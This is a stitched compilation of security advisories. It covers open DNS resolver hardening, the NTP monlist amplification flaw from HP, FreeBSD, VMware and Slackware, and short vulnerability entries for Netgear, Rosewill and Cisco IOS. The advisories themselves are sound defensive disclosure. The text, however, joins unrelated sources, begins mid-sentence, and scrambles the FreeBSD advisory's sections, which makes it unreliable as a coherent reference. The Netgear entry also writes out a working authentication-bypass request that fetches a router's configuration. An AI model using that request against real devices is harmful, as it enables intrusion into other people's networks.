recursion check box, and then click OK. Limiting Recursion to Authorized Clients For DNS servers that are deployed within an organization or ISP to support name queries on behalf of a client, the resolver should be configured to only allow queries on behalf of authorized clients. These requests should typically only come from clients within the organizations network address range. BIND9 In the global options, add the following [10]: acl corpnets { 192.168.1.0/24; 192.168.2.0/24; }; options { allow-query { corpnets; }; allow-recursion { corpnets; }; }; Microsoft DNS Server It is not currently possible to restrict recursive DNS requests to a specific client address range in Microsoft DNS Server. The most effective means of approximating this functionality is to configure the internal DNS server to forward queries to an external DNS server and restrict DNS traffic in the firewall to restrict port 53 UDP traffic to the internal server and the external forwarder [11]. Rate Limiting Response of Recursive Name Servers There is currently an experimental feature available as a set of patches for BIND9 that allows an administrator to restrict the number of responses per second being sent from the name server [12]. This is intended to reduce the effectiveness of DNS amplification attacks by reducing the volume of traffic coming from any single resolver. BIND9 On BIND9 implementation running the RRL patches, add the following lines to the options block of the authoritative views [13]: rate-limit { responses-per-second 5; window 5; }; Microsoft DNS Server This option is currently not available for Microsoft DNS Server. References * [1] Open DNS Resolver Project * [2] The Measurement Factory, "List Open Resolvers on Your Network" * [3] The Measurement Factory, "Open Resolver Test" * [4] The Measurement Factory, "Open Resolvers for Each Autonomous System" * [5] "DNSInspect," DNSInspect.com * [6] RFC 1034: DOMAIN NAMES - CONCEPTS AND FACILITIES * [7] BCP 38: Network Ingress Filtering: Defeating Denial of Service Attacks which employ IP Source Address Spoofing * [8] Chapter 3. Name Server Configuration * [9] Disable recursion on the DNS server * [10] Chapter 7. BIND 9 Security Considerations * [11] Configure a DNS Server to Use Forwarders * [12] DNS Response Rate Limiting (DNS RRL) * [13] Response Rate Limiting in the Domain Name System (DNS RRL) Revision History * March 29, 2013: Initial release Relevant URL(s): <http://openresolverproject.org/> <http://dns.measurement-factory.com/cgi-bin/openresolverquery.pl> <http://dns.measurement-factory.com/cgi-bin/openresolvercheck.pl> <http://dns.measurement-factory.com/surveys/openresolvers/ASN-reports/latest.html> <http://www.dnsinspect.com/> <http://tools.ietf.org/html/rfc1034> <http://tools.ietf.org/html/bcp38> <http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch03.html#id2567992> <http://technet.microsoft.com/en-us/library/cc787602.aspx> <http://ftp.isc.org/isc/bind9/cur/9.9/doc/arm/Bv9ARM.ch07.html#Access_Control_Lists> <http://technet.microsoft.com/en-us/library/cc754941.aspx> <http://ss.vix.su/~vixie/isc-tn-2012-1.txt> <http://www.redbarn.org/dns/ratelimits> ____________________________________________________________________ Produced by US-CERT, a government organization. ____________________________________________________________________ This product is provided subject to this Notification: http://www.us-cert.gov/privacy/notification/ Privacy & Use policy: http://www.us-cert.gov/privacy/ This document can also be found at http://www.us-cert.gov/ncas/alerts/TA13-088A For instructions on subscribing to or unsubscribing from this mailing list, visit http://www.us-cert.gov/mailing-lists-and-feeds/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iQEVAwUBUVXuq3dnhE8Qi3ZhAQIBXAf+LICtxQHGu5j7x8NAFG+tTSWrjducZ37v oWhQuSsXp9XjwAN1RdXOZRpX2Sbp5b1bVZ+FfjdPljoRVpoRksuBu5qOfzathZEP 3aRA7O0Kffuk2ofCsn8I9nWOas7bZa9gO8hGan4ORjEJLt4OWFtPW+2aWfDKY72x lcky1Ms6Z1TGkCTgJLuoUXXmGg8JQJqvRfkc7VAY4ttpJV1/DtpMIZyf2Hbr4inp ClnGYi64ukzu38kYkQ33u3oPKjYX8bwWKAZRnpQAcHO8ddswKre7Cz2Ar5tTNluY 0/nzEAx6BVAKgntp5NUJ8y55ej+RyEQiCpBAkhE8xImmxAUPJ7AiMw== =FVTl -----END PGP SIGNATURE----- . Release Date: 2015-09-09 Last Updated: 2015-09-09 Potential Security Impact: Remote denial of service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with the TCP/IP Services for OpenVMS running NTP. References: CVE-2014-9293 CVE-2014-9294 CVE-2014-9295 CVE-2014-9296 CVE-2013-5211 SSRT102239 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. TCP/IP Services for OpenVMS V5.7 ECO5 running NTP BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2014-9293 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9294 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9295 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-9296 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-5211 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has made the following patch kits available to resolve the vulnerabilities with TCP/IP Services for OpenVMS running NTP. Platform Patch Kit Name Alpha IA64 V8.4 75-117-380_2015-08-24.BCK NOTE: Please contact OpenVMS Technical Support to request these patch kits. HISTORY Version:1 (rev.1) - 9 September 2015 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Corrected: 2014-01-14 19:04:33 UTC (stable/10, 10.0-PRERELEASE) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RELEASE) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC5-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC4-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC3-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC2-p1) 2014-01-14 19:12:40 UTC (releng/10.0, 10.0-RC1-p1) 2014-01-14 19:20:41 UTC (stable/9, 9.2-STABLE) 2014-01-14 19:42:28 UTC (releng/9.2, 9.2-RELEASE-p3) 2014-01-14 19:42:28 UTC (releng/9.1, 9.1-RELEASE-p10) 2014-01-14 19:20:41 UTC (stable/8, 8.4-STABLE) 2014-01-14 19:42:28 UTC (releng/8.4, 8.4-RELEASE-p7) 2014-01-14 19:42:28 UTC (releng/8.3, 8.3-RELEASE-p14) CVE Name: CVE-2013-5211 For general information regarding FreeBSD Security Advisories, including descriptions of the fields above, security branches, and the following sections, please visit <URL:http://security.FreeBSD.org/>. Background The ntpd(8) daemon is an implementation of the Network Time Protocol (NTP) used to synchronize the time of a computer system to a reference time source. II. Problem Description The ntpd(8) daemon supports a query 'monlist' which provides a history of recent NTP clients without any authentication. III. Impact An attacker can send 'monlist' queries and use that as an amplification of a reflection attack. IV. This can be done by adding the following lines to /etc/ntp.conf: restrict -4 default nomodify nopeer noquery notrap restrict -6 default nomodify nopeer noquery notrap restrict 127.0.0.1 restrict -6 ::1 restrict 127.127.1.0 And restart the ntpd(8) daemon. Time service is not affected and the administrator can still perform queries from local host. 2) Use IP based restrictions in ntpd(8) itself or in IP firewalls to restrict which systems can access ntpd(8). 3) Replace the base system ntpd(8) with net/ntp-devel (version 4.2.7p76 or newer) V. Solution Perform one of the following: 1) Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch http://security.FreeBSD.org/patches/SA-14:02/ntpd.patch # fetch http://security.FreeBSD.org/patches/SA-14:02/ntpd.patch.asc # gpg --verify ntpd.patch.asc b) Execute the following commands as root: # cd /usr/src # patch < /path/to/patch Recompile the operating system using buildworld and installworld as described in <URL:http://www.FreeBSD.org/handbook/makeworld.html>. Restart the ntpd(8) daemon, or reboot the system. 3) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Note that the patch would disable monitoring features of ntpd(8) daemon by default. If the feature is desirable, the administrator can choose to enable it and firewall access to ntpd(8) service. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - ------------------------------------------------------------------------- stable/8/ r260641 releng/8.3/ r260647 releng/8.4/ r260647 stable/9/ r260641 releng/9.1/ r260647 releng/9.2/ r260647 stable/10/ r260639 releng/10.0/ r260641 - ------------------------------------------------------------------------- To see which files were modified by a particular revision, run the following command, replacing NNNNNN with the revision number, on a machine with Subversion installed: # svn diff -cNNNNNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NNNNNN with the revision number: <URL:http://svnweb.freebsd.org/base?view=revision&revision=NNNNNN> VII. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ----------------------------------------------------------------------- VMware Security Advisory Advisory ID: VMSA-2014-0002 Synopsis: VMware vSphere updates to third party libraries Issue date: 2014-03-11 Updated on: 2014-03-11 (initial advisory) CVE numbers: --NTP --- CVE-2013-5211 --glibc (service console) --- CVE-2013-4332 --JRE-- See references - ----------------------------------------------------------------------- 1. Summary VMware has updated vSphere third party libraries. 2. Relevant releases vCenter Server Appliance 5.5 prior to 5.5 Update 1 VMware vCenter Server 5.5 prior 5.5 Update 1 VMware Update Manager 5.5 prior 5.5 Update 1 VMware ESXi 5.5 without patch ESXi550-201403101-SG 3. Problem Description a. An attacker may send a forged request to a vulnerable NTP server resulting in an amplified response to the intended target of the DDoS attack. Mitigation Mitigation for this issue is documented in VMware Knowledge Base article 2070193. This article also documents when vSphere products are affected. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5211 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= VCSA 5.5 Linux 5.5 Update 1 VCSA 5.1 Linux patch pending VCSA 5.0 Linux patch pending ESXi 5.5 ESXi ESXi550-201403101-SG ESXi 5.1 ESXi patch pending ESXi 5.0 ESXi patch pending ESXi 4.1 ESXi patch pending ESXi 4.0 ESXi patch pending ESX 4.1 ESX patch pending ESX 4.0 ESX patch pending b. Update to ESXi glibc package The ESXi glibc package is updated to version glibc-2.5-118.el5_10.2 to resolve a security issue. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-4332 to this issue. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============== ======== ======= ================= ESXi 5.5 ESXi ESXi550-201403101-SG ESXi 5.1 ESXi patch pending ESXi 5.0 ESXi patch pending ESXi 4.1 ESXi no patch planned ESXi 4.0 ESXi no patch planned ESX 4.1 ESX not applicable ESX 4.0 ESX not applicable c. vCenter and Update Manager, Oracle JRE 1.7 Update 45 Oracle JRE is updated to version JRE 1.7 Update 45, which addresses multiple security issues that existed in earlier releases of Oracle JRE. Oracle has documented the CVE identifiers that are addressed in JRE 1.7.0 update 45 in the Oracle Java SE Critical Patch Update Advisory of October 2013. The References section provides a link to this advisory. Column 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. VMware Product Running Replace with/ Product Version on Apply Patch ============= ======= ======= ================= vCenter Server 5.5 Any 5.5 Update 1 vCenter Server 5.1 Any not applicable ** vCenter Server 5.0 Any not applicable ** vCenter Server 4.1 Windows not applicable ** vCenter Server 4.0 Windows not applicable * Update Manager 5.5 Windows 5.5 Update 1 Update Manager 5.1 Windows not applicable ** Update Manager 5.0 Windows not applicable ** Update Manager 4.1 Windows not applicable * Update Manager 4.0 Windows not applicable * ESXi any ESXi not applicable ESX 4.1 ESX not applicable ** ESX 4.0 ESX not applicable * * this product uses the Oracle JRE 1.5.0 family ** this product uses the Oracle JRE 1.6.0 family 4. Solution Please review the patch/release notes for your product and version and verify the checksum of your downloaded file. vCenter Server 5.5 -------------------------- Download link: https://downloads.vmware.com/d/info/datacenter_cloud_infrastructure/vmware_ vsphere/5_5 Release Notes: https://www.vmware.com/support/vsphere5/doc/vsphere-vcenter-server-55u1-rel ease-notes.html ESXi 5.5 ----------------- File: update-from-esxi5.5-5.5_update01.zip md5sum:5773844efc7d8e43135de46801d6ea25 sha1sum:6518355d260e81b562c66c5016781db9f077161f http://kb.vmware.com/kb/2065826 update-from-esxi5.5-5.5_update01 contains ESXi550-201403101-SG 5. References http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4332 --------- jre --------- Oracle Java SE Critical Patch Update Advisory of October 2013 http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html VMware Knowledge Base article 2070193 http://kb.vmware.com/kb/2070193 - ----------------------------------------------------------------------- 6. Change log 2014-03-11 VMSA-2014-0002 Initial security advisory in conjunction with the release of vSphere 5.5 Update 1 on 2014-03-11 - ----------------------------------------------------------------------- 7. Contact E-mail list for product security notifications and announcements: http://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce This Security Advisory is posted to the following lists: * security-announce at lists.vmware.com * bugtraq at securityfocus.com * full-disclosure at lists.grok.org.uk E-mail: security at vmware.com PGP key at: http://kb.vmware.com/kb/1055 VMware Security Advisories http://www.vmware.com/security/advisories VMware security response policy http://www.vmware.com/support/policies/security_response.html General support life cycle policy http://www.vmware.com/support/policies/eos.html Twitter https://twitter.com/VMwareSRC Copyright 2014 VMware Inc. All rights reserved. Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/ntp-4.2.6p5-i486-5_slack14.1.txz: Rebuilt. By default, Slackware is not vulnerable since it includes "noquery" as a default restriction. However, it is vulnerable if this restriction is removed. To help mitigate this flaw, "disable monitor" has been added to the default ntp.conf (which will disable the monlist command even if other queries are allowed), and the default restrictions have been extended to IPv6 as well. All users of the NTP daemon should make sure that their ntp.conf contains "disable monitor" to prevent misuse of the NTP service. The new ntp.conf file will be installed as /etc/ntp.conf.new with a package upgrade, but the changes will need to be merged into any existing ntp.conf file by the admin. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5211 http://www.kb.cert.org/vuls/id/348126 (* Security fix *) +--------------------------+ Where to find the new packages: +-----------------------------+ Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-) Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you. Please do not reply to this email address

The OMRON OpenWnn application before 1.3.6 for Android uses weak permissions for unspecified files, which allows attackers to obtain sensitive information via an application that accesses the local filesystem. OpenWnn for Android contains an issue in the access permissions for certain files. OpenWnn provided by OMRON SOFTWARE Co., Ltd. is a Japanese Input Method Editor (IME). OpenWnn for Android contains an issue in the access permissions for certain files. Gaku Mochizuki of Mitsui Bussan Secure Directions, Inc. reported this vulnerability to IPA. JPCERT/CC coordinated with the developer under Information Security Early Warning Partnership.If a user of the affected product uses other malicious Android application, information managed by the affected product may be disclosed. OpenWnn for Android is prone to an information-disclosure vulnerability. Successful exploits allow an attacker to gain access to sensitive information. Information obtained may aid in further attacks. OpenWnn for Android 1.3.5 and prior are vulnerable

The vulnerability is that the WEB server skips the authentication detection for certain URLs, such as the URL containing the string \".jpg\" at the end, so the attacker submits a request similar to the following to get the current device configuration: http://<target- Ip-address>/NETGEAR_fwpt.cfg?.jpg. NetGear WNR1000 is a wireless router. There is a remote authentication bypass vulnerability in NetGear WNR1000 router versions prior to 1.0.2.60. A remote attacker could use this vulnerability to bypass the authentication mechanism and gain unauthorized access

Rosewill RSVA11001/RSVA12001 is a camera device. Rosewill RSVA11001/RSVA12001 has a security vulnerability that allows remote attackers to exploit vulnerabilities by setting up NTP hosts to execute arbitrary commands.

The Smart Install client functionality in Cisco IOS 12.2 and 15.0 through 15.3 on Catalyst switches allows remote attackers to cause a denial of service (device reload) via crafted image list parameters in Smart Install packets, aka Bug ID CSCub55790. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cisco IOS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Smart Install client. A specially crafted packet can be sent to the SMI IBC server to instruct it to download the IOS config file and IOS image file(s). The attacker can specify a user account with highest access in the config file, allowing them to take complete control of the switch. An attacker can exploit this issue to cause an affected device to reload or become unresponsive, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCub55790. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment

Race condition in the VRF-aware NAT feature in Cisco IOS 12.2 through 12.4 and 15.0 through 15.2 allows remote attackers to cause a denial of service (memory consumption) via IPv4 packets, aka Bug IDs CSCtg47129 and CSCtz96745. Cisco IOS is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to reload or become unresponsive, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCtg47129. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment

The RSVP protocol implementation in Cisco IOS 12.2 and 15.0 through 15.2 and IOS XE 3.1.xS through 3.4.xS before 3.4.5S and 3.5.xS through 3.7.xS before 3.7.2S, when MPLS-TE is enabled, allows remote attackers to cause a denial of service (incorrect memory access and device reload) via a traffic engineering PATH message in an RSVP packet, aka Bug ID CSCtg39957. Attackers can exploit this issue to cause a reload of the affected devices, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCtg39957.http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&amp;bugId=CSCtg39957http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&amp;bugId=CSCtg39957. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment

Memory leak in the IKEv1 implementation in Cisco IOS 15.1 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055. Cisco IOS is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to reload or become unresponsive, denying service to legitimate users. This issue is tracked by Cisco Bug ID CSCth81055. http://tools.cisco.com/Support/BugToolKit/search/getBugDetails.do?method=fetchBugDetails&amp;bugId=CSCsq24002. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment

Memory leak in Cisco IOS 12.2, 12.4, 15.0, and 15.1, when Zone-Based Policy Firewall SIP application layer gateway inspection is enabled, allows remote attackers to cause a denial of service (memory consumption or device reload) via malformed SIP messages, aka Bug ID CSCtl99174. Cisco IOS is prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to cause an affected device to reload or become unresponsive, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCtl99174. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment

The Protocol Translation (PT) functionality in Cisco IOS 12.3 through 12.4 and 15.0 through 15.3, when one-step port-23 translation or a Telnet-to-PAD ruleset is configured, does not properly validate TCP connection information, which allows remote attackers to cause a denial of service (device reload) via an attempted connection to a PT resource, aka Bug ID CSCtz35999. Cisco IOS is prone to a remote denial-of-service vulnerability. Successfully exploiting this issue allows remote attackers to reload affected device, denying service to legitimate users. This issue is being tracked by Cisco Bug ID CSCtz35999. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment

The General Responder implementation in the IP Service Level Agreement (SLA) feature in Cisco IOS 15.2 and IOS XE 3.1.xS through 3.4.xS before 3.4.5S and 3.5.xS through 3.7.xS before 3.7.2S allows remote attackers to cause a denial of service (device reload) via crafted (1) IPv4 or (2) IPv6 IP SLA packets on UDP port 1167, aka Bug ID CSCuc72594. Cisco IOS is prone to a remote denial-of-service vulnerability. Successful exploit of this issue could allow the attacker to cause the targeted device to reload, resulting in denial-of-service conditions. This issue is being tracked by Cisco Bug ID CSCuc72594. Cisco IOS is an operating system developed by Cisco in the United States for its network equipment